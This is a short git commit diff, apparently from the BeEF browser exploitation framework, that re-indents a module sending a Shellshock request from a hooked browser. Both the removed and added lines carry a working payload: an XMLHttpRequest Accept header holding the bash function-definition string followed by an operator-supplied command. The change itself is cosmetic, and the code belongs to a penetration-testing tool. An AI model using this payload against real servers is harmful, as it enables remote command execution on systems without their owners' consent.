Re-indent

This commit is contained in:
Brendan Coles
2014-10-29 21:00:10 +00:00
parent 8e3c8e4b88
commit fb5712131e

View File

@@ -5,7 +5,6 @@
//
beef.execute(function () {
try {
var target = "<%=@Target%>";
var command = "<%=@Bash_Command%>";
@@ -20,10 +19,8 @@ beef.execute(function () {
}
}
xhr.setRequestHeader("Accept", "() { test;};echo \"Content-type: text/plain\"; echo; echo; " + command);
xhr.send(null);
}
catch (e){
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result= Something wrong "+e.message);
xhr.send(null);
} catch (e){
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result= Something wrong "+e.message);
}
});
});